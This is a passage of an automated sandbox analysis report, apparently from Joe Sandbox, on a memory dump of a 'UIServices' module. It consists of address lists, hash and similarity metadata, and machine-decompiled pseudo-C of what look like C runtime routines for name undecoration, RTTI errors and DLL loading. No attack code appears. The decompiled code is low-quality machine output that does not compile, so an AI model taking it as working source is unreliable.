                                                    0x7ffc23c631d5
                                                    0x7ffc23c631d9
                                                    0x7ffc23c631de
                                                    0x7ffc23c631e3
                                                    0x7ffc23c631e7
                                                    0x7ffc23c631f8
                                                    0x7ffc23c631fb
                                                    0x7ffc23c63200
                                                    0x7ffc23c6320d
                                                    0x7ffc23c63214
                                                    0x7ffc23c63216
                                                    0x7ffc23c6322a
                                                    0x7ffc23c6323b
                                                    0x7ffc23c6323d
                                                    0x7ffc23c63243
                                                    0x7ffc23c63249
                                                    0x7ffc23c6324b
                                                    0x7ffc23c63254
                                                    0x7ffc23c63259
                                                    0x7ffc23c6325c
                                                    0x7ffc23c63266
                                                    0x7ffc23c63268
                                                    0x7ffc23c6327e
                                                    0x7ffc23c63282
                                                    0x7ffc23c63289
                                                    0x7ffc23c63291
                                                    0x7ffc23c6329c
                                                    0x7ffc23c632a4
                                                    0x7ffc23c632ad
                                                    0x7ffc23c632b2
                                                    0x7ffc23c632b7
                                                    0x7ffc23c632bc
                                                    0x7ffc23c632c1
                                                    0x7ffc23c632c6
                                                    0x7ffc23c632ec
                                                    0x7ffc23c632f4
                                                    0x7ffc23c632f8
                                                    0x7ffc23c63313
                                                    0x7ffc23c6331b
                                                    0x7ffc23c6331f
                                                    0x7ffc23c6333a
                                                    0x7ffc23c63342
                                                    0x7ffc23c63346
                                                    0x7ffc23c63346
                                                    0x7ffc23c6334a
                                                    0x7ffc23c63350
                                                    0x7ffc23c63358
                                                    0x7ffc23c6335a
                                                    0x7ffc23c6335e
                                                    0x7ffc23c63365
                                                    0x7ffc23c63370
                                                    0x7ffc23c63376
                                                    0x7ffc23c63385
                                                    0x7ffc23c63387
                                                    0x7ffc23c6338c
                                                    0x7ffc23c63390
                                                    0x7ffc23c63395
                                                    0x7ffc23c63399
                                                    0x7ffc23c6339f
                                                    0x7ffc23c633a4
                                                    0x7ffc23c633ad
                                                    0x7ffc23c633b8
                                                    0x7ffc23c633c0
                                                    0x7ffc23c633c7
                                                    0x7ffc23c633ce
                                                    0x7ffc23c633d3
                                                    0x7ffc23c633d8
                                                    0x7ffc23c633e2
                                                    0x7ffc23c633e4
                                                    0x7ffc23c633ea
                                                    0x7ffc23c6340a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 211107550-393685449
                                                    • Opcode ID: 3d6be1f1c8a2245a47b14b00a023f54e19466ffc5ae8033eae6e49cb80112742
                                                    • Instruction ID: 2111567401afe0b686c27715d3faeb94594fbda27e5e11f1bf7ccab060e7bcde
                                                    • Opcode Fuzzy Hash: 3d6be1f1c8a2245a47b14b00a023f54e19466ffc5ae8033eae6e49cb80112742
                                                    • Instruction Fuzzy Hash: 5FE1A272B086658AE710DF38D8843AD7BA0FB84B48F144275EA9D677A5CF38E485CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 65%
                                                    			E00007FFC7FFC23C6B6DC(void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, void* __r8, void* __r14, long long _a8, long long _a16) {
                                                    				char _v24;
                                                    				intOrPtr _v32;
                                                    				char _v40;
                                                    				intOrPtr _v48;
                                                    				void* _v56;
                                                    				intOrPtr _t49;
                                                    				char* _t66;
                                                    				char* _t69;
                                                    				char* _t70;
                                                    				char* _t73;
                                                    				long long* _t82;
                                                    				intOrPtr* _t94;
                                                    				intOrPtr* _t100;
                                                    
                                                    				_t102 = __rsi;
                                                    				_t50 = __edx;
                                                    				_a8 = __rbx;
                                                    				_a16 = __rdi;
                                                    				_t66 =  *0x23c74360; // 0x0
                                                    				_t82 = __rcx;
                                                    				_t100 = __rdx;
                                                    				if ( *_t66 == 0) goto 0x23c6b878;
                                                    				if (r8d == 0) goto 0x23c6b796;
                                                    				if ( *_t66 != 0x58) goto 0x23c6b77a;
                                                    				 *0x23c74360 = _t66 + 1;
                                                    				_t94 =  &_v40;
                                                    				if ( *__rdx != __rcx) goto 0x23c6b74e;
                                                    				_v48 = 4;
                                                    				_v56 = "void";
                                                    				asm("movaps xmm0, [ebp-0x30]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66CF4("void", __rcx, _t94);
                                                    				goto 0x23c6b895;
                                                    				_t69 = "void ";
                                                    				_v48 = 5;
                                                    				_v56 = _t69;
                                                    				asm("movaps xmm0, [ebp-0x30]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66CF4(_t69,  &_v24, _t94);
                                                    				goto 0x23c6b88a;
                                                    				if ( *_t69 != 0x5f) goto 0x23c6b796;
                                                    				if ( *((char*)(_t69 + 1)) != 0x5f) goto 0x23c6b796;
                                                    				if ( *((char*)(_t69 + 2)) != 0x5a) goto 0x23c6b796;
                                                    				_t70 = _t69 + 3;
                                                    				 *0x23c74360 = _t70;
                                                    				if ( *_t70 != 0x24) goto 0x23c6b7e1;
                                                    				if ( *((char*)(_t70 + 1)) != 0x24) goto 0x23c6b7fd;
                                                    				if ( *((char*)(_t70 + 2)) != 0x54) goto 0x23c6b7fd;
                                                    				 *0x23c74360 = _t70 + 3;
                                                    				if ( *_t94 != _t69) goto 0x23c6b7ce;
                                                    				_v48 = 0xe;
                                                    				goto 0x23c6b734;
                                                    				_t73 = "std::nullptr_t ";
                                                    				_v48 = 0xf;
                                                    				goto 0x23c6b75c;
                                                    				if ( *_t73 != 0x59) goto 0x23c6b7fd;
                                                    				 *0x23c74360 = _t73 + 1;
                                                    				E00007FFC7FFC23C68558(0, __edx, __edi, __rcx, __rcx,  &_v40, __rdx, __rsi);
                                                    				goto 0x23c6b895;
                                                    				E00007FFC7FFC23C68898(_t50, __edi, _t82,  &_v56,  &_v40, _t100, _t102, __r14);
                                                    				if (( *(_t100 + 8) & 0x00004000) == 0) goto 0x23c6b850;
                                                    				_t75 = "cli::array<";
                                                    				_v32 = 0xb;
                                                    				_v40 = "cli::array<";
                                                    				asm("movaps xmm0, [ebp-0x20]");
                                                    				asm("movdqa [ebp-0x20], xmm0");
                                                    				E00007FFC7FFC23C66CF4("cli::array<",  &_v24,  &_v40);
                                                    				E00007FFC7FFC23C66F74(_t75,  &_v40,  &_v56);
                                                    				goto 0x23c6b870;
                                                    				if (( *(_t100 + 8) & 0x00002000) == 0) goto 0x23c6b869;
                                                    				_v32 = 0xd;
                                                    				goto 0x23c6b81d;
                                                    				_t49 = _v48;
                                                    				 *_t82 = _v56;
                                                    				 *((intOrPtr*)(_t82 + 8)) = _t49;
                                                    				goto 0x23c6b895;
                                                    				_v32 = _t49;
                                                    				_v40 = 0x23c71ac0;
                                                    				return E00007FFC7FFC23C66F74( &_v40, _t82, _t100);
                                                    			}
















                                                    0x7ffc23c6b6dc
                                                    0x7ffc23c6b6dc
                                                    0x7ffc23c6b6dc
                                                    0x7ffc23c6b6e1
                                                    0x7ffc23c6b6ee
                                                    0x7ffc23c6b6f5
                                                    0x7ffc23c6b6fa
                                                    0x7ffc23c6b6ff
                                                    0x7ffc23c6b708
                                                    0x7ffc23c6b711
                                                    0x7ffc23c6b716
                                                    0x7ffc23c6b720
                                                    0x7ffc23c6b724
                                                    0x7ffc23c6b72d
                                                    0x7ffc23c6b734
                                                    0x7ffc23c6b73b
                                                    0x7ffc23c6b73f
                                                    0x7ffc23c6b744
                                                    0x7ffc23c6b749
                                                    0x7ffc23c6b74e
                                                    0x7ffc23c6b755
                                                    0x7ffc23c6b75c
                                                    0x7ffc23c6b764
                                                    0x7ffc23c6b768
                                                    0x7ffc23c6b76d
                                                    0x7ffc23c6b775
                                                    0x7ffc23c6b77d
                                                    0x7ffc23c6b783
                                                    0x7ffc23c6b789
                                                    0x7ffc23c6b78b
                                                    0x7ffc23c6b78f
                                                    0x7ffc23c6b799
                                                    0x7ffc23c6b79f
                                                    0x7ffc23c6b7a5
                                                    0x7ffc23c6b7ab
                                                    0x7ffc23c6b7b9
                                                    0x7ffc23c6b7c2
                                                    0x7ffc23c6b7c9
                                                    0x7ffc23c6b7ce
                                                    0x7ffc23c6b7d5
                                                    0x7ffc23c6b7dc
                                                    0x7ffc23c6b7e4
                                                    0x7ffc23c6b7ec
                                                    0x7ffc23c6b7f3
                                                    0x7ffc23c6b7f8
                                                    0x7ffc23c6b801
                                                    0x7ffc23c6b80d
                                                    0x7ffc23c6b80f
                                                    0x7ffc23c6b816
                                                    0x7ffc23c6b81d
                                                    0x7ffc23c6b825
                                                    0x7ffc23c6b82d
                                                    0x7ffc23c6b832
                                                    0x7ffc23c6b842
                                                    0x7ffc23c6b84e
                                                    0x7ffc23c6b857
                                                    0x7ffc23c6b860
                                                    0x7ffc23c6b867
                                                    0x7ffc23c6b869
                                                    0x7ffc23c6b870
                                                    0x7ffc23c6b873
                                                    0x7ffc23c6b876
                                                    0x7ffc23c6b87f
                                                    0x7ffc23c6b882
                                                    0x7ffc23c6b8a7

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                    • API String ID: 2943138195-2239912363
                                                    • Opcode ID: 68c5c0637b4c1963eeecbad4f09a755e943d175f319f11fa5f1955fc6c7127ce
                                                    • Instruction ID: 4e676f997d155df8937a5aec5d39484f79485ab7bc8417a28fcceff1c2071475
                                                    • Opcode Fuzzy Hash: 68c5c0637b4c1963eeecbad4f09a755e943d175f319f11fa5f1955fc6c7127ce
                                                    • Instruction Fuzzy Hash: F5513772F18B6A88FB119B69EC452AC37B4FB88748F444275DE4D22795DF3CA144CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 40%
                                                    			E00007FFC7FFC23C65CAA(void* __edx, void* __eflags, long long __rbx, long long __rsi, void* __r8, void* __r9, long long _a16, long long _a24, char _a32) {
                                                    				void* _v40;
                                                    				void* _t8;
                                                    				long long _t17;
                                                    				char* _t20;
                                                    				long long _t26;
                                                    
                                                    				_t26 = __rsi;
                                                    				_t17 = __rbx;
                                                    				E00007FFC7FFC23C65C28(_t8,  &_a32, "Access violation - no RTTI data!");
                                                    				_t20 =  &_a32;
                                                    				E00007FFC7FFC23C66190(__rbx, _t20, 0x23c73038, __rsi);
                                                    				asm("int3");
                                                    				asm("int3");
                                                    				asm("int3");
                                                    				_a16 = _t17;
                                                    				_a24 = _t26;
                                                    				if (_t20 != 0) goto 0x23c65d16;
                                                    				return 0;
                                                    			}








                                                    0x7ffc23c65caa
                                                    0x7ffc23c65caa
                                                    0x7ffc23c65cb6
                                                    0x7ffc23c65cc2
                                                    0x7ffc23c65cc7
                                                    0x7ffc23c65ccd
                                                    0x7ffc23c65cce
                                                    0x7ffc23c65ccf
                                                    0x7ffc23c65cd0
                                                    0x7ffc23c65cd5
                                                    0x7ffc23c65cf8
                                                    0x7ffc23c65d15

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                    • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                    • API String ID: 1852475696-928371585
                                                    • Opcode ID: 57321e3e2beede4a271958e6e1a88a86d3ee191e10f4716107e611c04c83643e
                                                    • Instruction ID: 2d1f5bf7b8e2dd90ef6c63c4e92b530ccd63c9fda62c251f629241b558e811c3
                                                    • Opcode Fuzzy Hash: 57321e3e2beede4a271958e6e1a88a86d3ee191e10f4716107e611c04c83643e
                                                    • Instruction Fuzzy Hash: CE51D432718A6A92EE60DB18EC845B96360FF84B84F204675DF8E576A5DF3CE105CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00007FFC7FFC23C6D854(void* __edx, void* __edi, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, void* __rsi, void* __r8, void* __r10, void* __r11, void* __r12) {
                                                    				intOrPtr _t51;
                                                    				signed int _t55;
                                                    				signed int _t65;
                                                    				signed int _t67;
                                                    				void* _t68;
                                                    				intOrPtr* _t88;
                                                    				char* _t89;
                                                    				char* _t91;
                                                    				char* _t92;
                                                    				char* _t93;
                                                    				char* _t95;
                                                    				long long* _t128;
                                                    				void* _t132;
                                                    				void* _t134;
                                                    				void* _t143;
                                                    
                                                    				_t143 = __r11;
                                                    				_t130 = __rsi;
                                                    				_t100 = __rbx;
                                                    				_t68 = __edx;
                                                    				 *((long long*)(_t134 + 8)) = __rbx;
                                                    				 *((long long*)(_t134 + 0x10)) = __rdi;
                                                    				_t132 = _t134 - 0x57;
                                                    				_t128 = __rcx;
                                                    				 *__rcx =  *((intOrPtr*)(__rdx));
                                                    				_t51 =  *((intOrPtr*)(__rdx + 8));
                                                    				 *((intOrPtr*)(__rcx + 8)) = _t51;
                                                    				if (_t51 - 1 > 0) goto 0x23c6da43;
                                                    				_t88 =  *0x23c74360; // 0x0
                                                    				 *(_t132 + 0xf) =  *(_t132 + 0xf) & 0x00000000;
                                                    				if ( *_t88 == 0) goto 0x23c6da1b;
                                                    				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                    				_t10 = _t132 - 9; // 0x5ff7
                                                    				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                    				_t13 = _t132 + 7; // 0x6007
                                                    				 *(_t132 + 7) =  *(_t132 + 7) & 0x00000000;
                                                    				_t16 = _t132 + 0x17; // 0x6017
                                                    				 *(_t134 - 0x90 + 0x20) =  *(_t134 - 0x90 + 0x20) & 0x00000000;
                                                    				r8d = 0;
                                                    				E00007FFC7FFC23C68F1C(__edi, __rbx, _t16, _t13, __rcx, __rsi, _t10);
                                                    				r8b = 0x20;
                                                    				_t19 = _t132 + 0x27; // 0x6027
                                                    				_t20 = _t132 + 0x17; // 0x6017
                                                    				E00007FFC7FFC23C66FA0(_t20, _t19);
                                                    				_t21 = _t132 + 0x37; // 0x6037
                                                    				E00007FFC7FFC23C66F74(_t88, _t21, _t128);
                                                    				 *_t128 =  *_t88;
                                                    				_t55 =  *(_t88 + 8);
                                                    				 *(_t128 + 8) = _t55;
                                                    				if (_t55 - 1 > 0) goto 0x23c6da43;
                                                    				_t89 =  *0x23c74360; // 0x0
                                                    				if ( *_t89 == 0x40) goto 0x23c6da0f;
                                                    				 *(_t132 + 0xf) = 5;
                                                    				 *(_t132 + 7) = 0x23c718cc;
                                                    				_t26 = _t132 + 0x17; // 0x6017
                                                    				asm("movaps xmm0, [ebp+0x7]");
                                                    				asm("movdqa [ebp+0x17], xmm0");
                                                    				E00007FFC7FFC23C66FF8(_t68, __edi, 0x23c718cc, _t100, _t128, _t26, _t130);
                                                    				_t91 =  *0x23c74360; // 0x0
                                                    				if ( *(_t128 + 8) - 1 > 0) goto 0x23c6da0a;
                                                    				if ( *_t91 == 0) goto 0x23c6d9ec;
                                                    				if ( *_t91 == 0x40) goto 0x23c6d9e2;
                                                    				_t28 = _t132 + 0x37; // 0x6037
                                                    				E00007FFC7FFC23C6BC80(__edi, _t100, _t28, _t128, _t130, __r10, _t143, __r12);
                                                    				 *(_t132 - 9) =  *(_t132 - 9) & 0x00000000;
                                                    				_t31 = _t132 - 9; // 0x5ff7
                                                    				 *(_t132 - 1) =  *(_t132 - 1) & 0x00000000;
                                                    				_t101 = _t91;
                                                    				E00007FFC7FFC23C68150(0x60, _t91, _t91, _t31);
                                                    				_t34 = _t132 + 0x17; // 0x6017
                                                    				_t35 = _t132 - 9; // 0x5ff7
                                                    				E00007FFC7FFC23C66F74(_t35, _t34, _t91);
                                                    				r8b = 0x27;
                                                    				_t36 = _t132 + 0x47; // 0x6047
                                                    				_t37 = _t132 + 0x17; // 0x6017
                                                    				E00007FFC7FFC23C66FA0(_t37, _t36);
                                                    				E00007FFC7FFC23C67078( *(_t128 + 8), _t128, _t91, _t91);
                                                    				_t92 =  *0x23c74360; // 0x0
                                                    				if ( *_t92 != 0x40) goto 0x23c6d9ad;
                                                    				_t93 = _t92 + 1;
                                                    				 *0x23c74360 = _t93;
                                                    				_t67 =  *(_t128 + 8);
                                                    				if (_t67 - 1 > 0) goto 0x23c6da0a;
                                                    				if ( *_t93 == 0x40) goto 0x23c6d931;
                                                    				 *(_t132 + 0xf) = 2;
                                                    				 *(_t132 + 7) = 0x23c718d4;
                                                    				_t41 = _t132 + 0x27; // 0x6027
                                                    				asm("movaps xmm0, [ebp+0x7]");
                                                    				asm("movdqa [ebp+0x27], xmm0");
                                                    				goto 0x23c6d91f;
                                                    				if (_t67 - 1 > 0) goto 0x23c6da0a;
                                                    				if ( *0x23c718d4 != 0) goto 0x23c6d9f9;
                                                    				E00007FFC7FFC23C67198(1, 0x23c718d4, _t128, _t41);
                                                    				E00007FFC7FFC23C6712C(0x7d, 0x23c718d4, _t101, _t128);
                                                    				_t95 =  *0x23c74360; // 0x0
                                                    				if ( *_t95 != 0x40) goto 0x23c6da43;
                                                    				 *0x23c74360 = _t95 + 1;
                                                    				goto 0x23c6da43;
                                                    				_t42 = _t132 - 9; // 0x5ff7
                                                    				 *(_t132 + 7) = 0x23c71ac0;
                                                    				_t44 = _t132 + 7; // 0x6007
                                                    				E00007FFC7FFC23C66F74(_t44, _t42, _t128);
                                                    				 *_t128 =  *(_t132 - 9);
                                                    				_t65 =  *(_t132 - 1);
                                                    				 *(_t128 + 8) = _t65;
                                                    				return _t65;
                                                    			}


















                                                    0x7ffc23c6d854
                                                    0x7ffc23c6d854
                                                    0x7ffc23c6d854
                                                    0x7ffc23c6d854
                                                    0x7ffc23c6d854
                                                    0x7ffc23c6d859
                                                    0x7ffc23c6d85f
                                                    0x7ffc23c6d86e
                                                    0x7ffc23c6d871
                                                    0x7ffc23c6d874
                                                    0x7ffc23c6d877
                                                    0x7ffc23c6d87c
                                                    0x7ffc23c6d882
                                                    0x7ffc23c6d889
                                                    0x7ffc23c6d890
                                                    0x7ffc23c6d896
                                                    0x7ffc23c6d89b
                                                    0x7ffc23c6d89f
                                                    0x7ffc23c6d8a3
                                                    0x7ffc23c6d8a7
                                                    0x7ffc23c6d8ac
                                                    0x7ffc23c6d8b0
                                                    0x7ffc23c6d8b5
                                                    0x7ffc23c6d8b8
                                                    0x7ffc23c6d8bd
                                                    0x7ffc23c6d8c0
                                                    0x7ffc23c6d8c4
                                                    0x7ffc23c6d8c8
                                                    0x7ffc23c6d8d0
                                                    0x7ffc23c6d8d7
                                                    0x7ffc23c6d8df
                                                    0x7ffc23c6d8e2
                                                    0x7ffc23c6d8e5
                                                    0x7ffc23c6d8ea
                                                    0x7ffc23c6d8f0
                                                    0x7ffc23c6d8fa
                                                    0x7ffc23c6d907
                                                    0x7ffc23c6d90e
                                                    0x7ffc23c6d912
                                                    0x7ffc23c6d916
                                                    0x7ffc23c6d91a
                                                    0x7ffc23c6d922
                                                    0x7ffc23c6d92a
                                                    0x7ffc23c6d934
                                                    0x7ffc23c6d93d
                                                    0x7ffc23c6d946
                                                    0x7ffc23c6d94c
                                                    0x7ffc23c6d950
                                                    0x7ffc23c6d955
                                                    0x7ffc23c6d95a
                                                    0x7ffc23c6d95e
                                                    0x7ffc23c6d964
                                                    0x7ffc23c6d967
                                                    0x7ffc23c6d96f
                                                    0x7ffc23c6d973
                                                    0x7ffc23c6d977
                                                    0x7ffc23c6d97c
                                                    0x7ffc23c6d97f
                                                    0x7ffc23c6d983
                                                    0x7ffc23c6d987
                                                    0x7ffc23c6d992
                                                    0x7ffc23c6d997
                                                    0x7ffc23c6d9a1
                                                    0x7ffc23c6d9a3
                                                    0x7ffc23c6d9a6
                                                    0x7ffc23c6d9ad
                                                    0x7ffc23c6d9b3
                                                    0x7ffc23c6d9b8
                                                    0x7ffc23c6d9c5
                                                    0x7ffc23c6d9cc
                                                    0x7ffc23c6d9d0
                                                    0x7ffc23c6d9d4
                                                    0x7ffc23c6d9d8
                                                    0x7ffc23c6d9dd
                                                    0x7ffc23c6d9e5
                                                    0x7ffc23c6d9ea
                                                    0x7ffc23c6d9f4
                                                    0x7ffc23c6d9fe
                                                    0x7ffc23c6da03
                                                    0x7ffc23c6da0d
                                                    0x7ffc23c6da12
                                                    0x7ffc23c6da19
                                                    0x7ffc23c6da25
                                                    0x7ffc23c6da29
                                                    0x7ffc23c6da2d
                                                    0x7ffc23c6da31
                                                    0x7ffc23c6da3a
                                                    0x7ffc23c6da3d
                                                    0x7ffc23c6da40
                                                    0x7ffc23c6da5a

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: {for
                                                    • API String ID: 179159573-864106941
                                                    • Opcode ID: 534cda0995084ab424b88ff705906f0fbc45ae35ad2814ab319565cd73dc21c1
                                                    • Instruction ID: c3cfd855c2302578e9923eb5303ed06bf5673b91f126568e83732fc3853b4447
                                                    • Opcode Fuzzy Hash: 534cda0995084ab424b88ff705906f0fbc45ae35ad2814ab319565cd73dc21c1
                                                    • Instruction Fuzzy Hash: 9F518072B08A9A99E701DF29DC453E837A4FB84748F8082B2EA4C27B95DF7CD554C760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 23%
                                                    			E00007FFC7FFC23C6664C(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                                                    				long _t37;
                                                    				intOrPtr _t60;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t66;
                                                    				intOrPtr _t67;
                                                    				struct HINSTANCE__* _t80;
                                                    				long long _t84;
                                                    				void* _t88;
                                                    				struct HINSTANCE__* _t93;
                                                    				long _t96;
                                                    				void* _t99;
                                                    				signed long long _t100;
                                                    				WCHAR* _t103;
                                                    
                                                    				 *((long long*)(_t88 + 8)) = __rbx;
                                                    				 *((long long*)(_t88 + 0x10)) = _t84;
                                                    				 *((long long*)(_t88 + 0x18)) = __rsi;
                                                    				_t60 =  *((intOrPtr*)(0x7ffc23c60000 + 0x14318 + _t80 * 8));
                                                    				_t100 = _t99 | 0xffffffff;
                                                    				if (_t60 == _t100) goto 0x23c6677a;
                                                    				if (_t60 != 0) goto 0x23c6677c;
                                                    				if (__r8 == __r9) goto 0x23c66772;
                                                    				_t66 =  *((intOrPtr*)(0x7ffc23c60000 + 0x14300 + __rsi * 8));
                                                    				if (_t66 == 0) goto 0x23c666bc;
                                                    				if (_t66 != _t100) goto 0x23c66754;
                                                    				goto 0x23c66728;
                                                    				r8d = 0x800;
                                                    				LoadLibraryExW(_t103, _t99, _t96);
                                                    				_t67 = _t60;
                                                    				if (_t60 != 0) goto 0x23c66734;
                                                    				_t37 = GetLastError();
                                                    				if (_t37 != 0x57) goto 0x23c66716;
                                                    				_t14 = _t67 + 7; // 0x7
                                                    				r8d = _t14;
                                                    				__imp__wcsncmp();
                                                    				if (_t37 == 0) goto 0x23c66716;
                                                    				r8d = 0;
                                                    				LoadLibraryExW(??, ??, ??);
                                                    				if (_t60 != 0) goto 0x23c66734;
                                                    				 *((intOrPtr*)(0x7ffc23c60000 + 0x14300 + __rsi * 8)) = _t100;
                                                    				goto 0x23c6669b;
                                                    				_t21 = 0x7ffc23c60000 + 0x14300 + __rsi * 8;
                                                    				_t64 =  *_t21;
                                                    				 *_t21 = _t60;
                                                    				if (_t64 == 0) goto 0x23c66754;
                                                    				FreeLibrary(_t93);
                                                    				GetProcAddress(_t80);
                                                    				if (_t64 == 0) goto 0x23c66772;
                                                    				 *((intOrPtr*)(0x7ffc23c60000 + 0x14318 + _t80 * 8)) = _t64;
                                                    				goto 0x23c6677c;
                                                    				 *((intOrPtr*)(0x7ffc23c60000 + 0x14318 + _t80 * 8)) = _t100;
                                                    				return 0;
                                                    			}
















                                                    0x7ffc23c6664c
                                                    0x7ffc23c66651
                                                    0x7ffc23c66656
                                                    0x7ffc23c6667a
                                                    0x7ffc23c66682
                                                    0x7ffc23c66689
                                                    0x7ffc23c66692
                                                    0x7ffc23c6669b
                                                    0x7ffc23c666a4
                                                    0x7ffc23c666af
                                                    0x7ffc23c666b4
                                                    0x7ffc23c666ba
                                                    0x7ffc23c666c9
                                                    0x7ffc23c666cf
                                                    0x7ffc23c666d5
                                                    0x7ffc23c666db
                                                    0x7ffc23c666dd
                                                    0x7ffc23c666e6
                                                    0x7ffc23c666e8
                                                    0x7ffc23c666e8
                                                    0x7ffc23c666f6
                                                    0x7ffc23c666fe
                                                    0x7ffc23c66700
                                                    0x7ffc23c66708
                                                    0x7ffc23c66714
                                                    0x7ffc23c66720
                                                    0x7ffc23c6672f
                                                    0x7ffc23c6673e
                                                    0x7ffc23c6673e
                                                    0x7ffc23c6673e
                                                    0x7ffc23c66749
                                                    0x7ffc23c6674e
                                                    0x7ffc23c6675a
                                                    0x7ffc23c66763
                                                    0x7ffc23c66768
                                                    0x7ffc23c66770
                                                    0x7ffc23c66772
                                                    0x7ffc23c66798

                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFC23C6680B,?,?,00000000,00007FFC23C6663C,?,?,?,?,00007FFC23C66385), ref: 00007FFC23C666CF
                                                    • GetLastError.KERNEL32(?,?,?,00007FFC23C6680B,?,?,00000000,00007FFC23C6663C,?,?,?,?,00007FFC23C66385), ref: 00007FFC23C666DD
                                                    • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFC23C6680B,?,?,00000000,00007FFC23C6663C,?,?,?,?,00007FFC23C66385), ref: 00007FFC23C666F6
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFC23C6680B,?,?,00000000,00007FFC23C6663C,?,?,?,?,00007FFC23C66385), ref: 00007FFC23C66708
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFC23C6680B,?,?,00000000,00007FFC23C6663C,?,?,?,?,00007FFC23C66385), ref: 00007FFC23C6674E
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFC23C6680B,?,?,00000000,00007FFC23C6663C,?,?,?,?,00007FFC23C66385), ref: 00007FFC23C6675A
                                                    Strings
                                                    Memory Dump Source
